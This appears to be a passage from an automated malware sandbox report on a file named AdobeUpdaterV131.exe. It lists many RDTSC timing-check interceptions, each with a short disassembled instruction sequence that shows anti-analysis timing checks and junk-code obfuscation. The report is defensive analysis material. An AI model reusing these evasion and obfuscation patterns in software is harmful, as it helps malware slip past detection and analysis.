Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903082 second address: 903086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90318D second address: 9031AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F09D0D9C3D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90325E second address: 903262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903689 second address: 90368F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90368F second address: 90369F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90369F second address: 9036A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903765 second address: 90376A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903885 second address: 903889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903D43 second address: 903D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903D9C second address: 903DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F09D0D9C3F4h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F09D0D9C3D8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F09D0D9C3DAh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 905DB7 second address: 905DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 905505 second address: 90554C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0D9C3E6h 0x00000008 jmp 00007F09D0D9C3E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F09D0D9C3E9h 0x00000018 jmp 00007F09D0D9C3DFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90554C second address: 905552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 905552 second address: 905556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9071BD second address: 9071C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 907F98 second address: 907FA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0D9C3D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 908A84 second address: 908A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 908A88 second address: 908A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90CE1F second address: 90CE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90F340 second address: 90F344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90F344 second address: 90F348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 908817 second address: 908825 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90F348 second address: 90F351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 908825 second address: 90884C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90884C second address: 908868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91032C second address: 910383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F09D0D9C3D8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov ebx, 57C824C3h 0x00000026 mov dword ptr [ebp+122D1D29h], eax 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 xchg eax, esi 0x00000031 jbe 00007F09D0D9C3E7h 0x00000037 jmp 00007F09D0D9C3E1h 0x0000003c push eax 0x0000003d push ecx 0x0000003e pushad 0x0000003f jo 00007F09D0D9C3D6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9122C0 second address: 912339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F09D0731CA8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b movzx ebx, cx 0x0000002e add ebx, 74AE3EE4h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 sub edi, 4E45006Ah 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+1245A33Eh], edx 0x00000046 mov bl, 0Dh 0x00000048 xchg eax, esi 0x00000049 jmp 00007F09D0731CB2h 0x0000004e push eax 0x0000004f pushad 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9131D4 second address: 9131D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 909D00 second address: 909D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90D624 second address: 90D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90E577 second address: 90E57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91141C second address: 911423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9124A0 second address: 91251E instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D33B5h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movsx edi, cx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F09D0731CA8h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov eax, dword ptr [ebp+122D0F45h] 0x00000045 mov ebx, dword ptr [ebp+122D35ACh] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007F09D0731CA8h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90D62A second address: 90D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90F526 second address: 90F534 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 911423 second address: 911435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F09D0D9C3D6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91251E second address: 912522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90D62F second address: 90D642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90F534 second address: 90F538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 911435 second address: 91143A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 912522 second address: 912526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91143A second address: 911440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91726D second address: 9172E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F09D0731CA8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+124474F8h], ecx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F09D0731CA8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D28A5h], edx 0x0000004f mov di, ax 0x00000052 push 00000000h 0x00000054 mov dword ptr [ebp+122D1C04h], eax 0x0000005a add ebx, 4CE83800h 0x00000060 xchg eax, esi 0x00000061 pushad 0x00000062 push ebx 0x00000063 pushad 0x00000064 popad 0x00000065 pop ebx 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 911440 second address: 911444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9172E4 second address: 9172F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 916523 second address: 916527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9172F2 second address: 9172F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91151D second address: 911521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 911521 second address: 911527 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 911527 second address: 91152C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9193D2 second address: 9193EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9193EB second address: 9193F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9193F5 second address: 9193F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 917442 second address: 91745B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91A569 second address: 91A5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F09D0731CA8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F09D0731CA8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov ebx, dword ptr [ebp+122D1A01h] 0x00000045 push 00000000h 0x00000047 jmp 00007F09D0731CB9h 0x0000004c push eax 0x0000004d pushad 0x0000004e jmp 00007F09D0731CACh 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 921ED7 second address: 921EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jl 00007F09D0D9C3E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 921EE8 second address: 921EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91A746 second address: 91A74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 91A80A second address: 91A80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92640B second address: 926437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F09D0D9C3E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8C1BDE second address: 8C1BEB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0731CA8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 925B57 second address: 925B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 925CBB second address: 925CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 925E1C second address: 925E33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F09D0D9C3DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 925FD5 second address: 925FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F09D0731CB2h 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 925FF1 second address: 926010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E4h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92FD7F second address: 92FD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92FF01 second address: 92FF21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F09D0D9C3DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92FF21 second address: 92FF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92FF25 second address: 92FF40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F09D0D9C3D6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jnp 00007F09D0D9C3DEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92FFEF second address: 92FFF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92FFF5 second address: 92FFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 92FFFB second address: 92FFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 934225 second address: 934230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F09D0D9C3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9344EB second address: 9344FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F09D0731CA6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 93463B second address: 93463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 93463F second address: 934678 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F09D0731CA6h 0x00000008 jmp 00007F09D0731CB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F09D0731CAFh 0x00000017 pop ebx 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jo 00007F09D0731CA6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 93945E second address: 939467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 939467 second address: 93947E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0731CAEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 939CAD second address: 939CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F09D0D9C3E3h 0x00000014 push edi 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 939FC4 second address: 939FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 940941 second address: 940945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 940945 second address: 940958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F09D0731CADh 0x0000000b rdtsc
